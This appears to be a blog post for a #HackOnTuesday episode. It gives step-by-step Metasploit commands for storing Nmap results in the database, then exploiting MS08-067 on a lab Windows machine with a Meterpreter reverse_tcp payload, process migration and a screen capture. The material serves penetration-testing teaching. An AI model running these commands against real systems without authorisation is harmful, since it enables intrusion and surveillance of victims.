At the end of each #HackOnTuesday episode, we invite everyone to send us their questions and suggestions for the next episodes. Among the comments and e-mails we’ve received since the last episode, we got one that caught our attention where Dawson, an IT admin from Oregon, asked us if we could briefly explain how to use the db_* commands of Metasploit. So, in this episode, Gianni shows how to use the Metasploit database to store the data collected with Nmap, and how to use it to populate the RHOSTS variable of Metasploit modules. After that, Gianni moves one and exploits a common vulnerability in one of the Windows boxes on the network.

Tools, Scripts, and Exploits

Steps

  • Connect Metasploit to the PostgresSQL DB
    • db_status
    • db_connect -y /opt/metasploit-framework/database.yml
    • db_status
  • Add a new workspace in Metasploit
    • workspace -h
    • workspace -a hackontuesday
    • workspace
  • Launch Nmap and import results into Metasploit
    • nmap -sT 192.168.75.0/24 -p80,139,445 -oX net.xml
    • db_import /home/kusanagi/net.xml
    • hosts
  • Use the Metasploit’s db_nmap command to scan the target machine and automatically save the results into the database
    • db_nmap -Pn -sV 192.168.75.138
  • Set the RHOSTS variable of the smb_version module with data from the Metasploit Database
    • search smb
    • use auxiliary/scanner/smb/smb_version
    • show options
    • services
    • services -h
    • services -u
    • services -u -p 445
    • services -u -p 445 -R
    • show options
    • run
  • Use the Metasploit’s ms08_067_netapi module to get code execution
    • search ms08_067_netapi
    • use exploit/windows/smb/ms08_067_netapi
    • show options
    • set RHOST 192.168.75.138
    • show targets
    • set TARGET 7
    • show payloads
    • set PAYLOAD windows/meterpreter/reverse_tcp
    • show options
    • /sbin/ifconfig
    • set LHOST 192.168.75.146
    • show options
    • exploit
  • Capture the screen of the victim
    • sysinfo
    • ps
    • migrate 1940
    • use espia
    • screengrab
  • Game Over!

Leave a Reply

Your email address will not be published. Required fields are marked *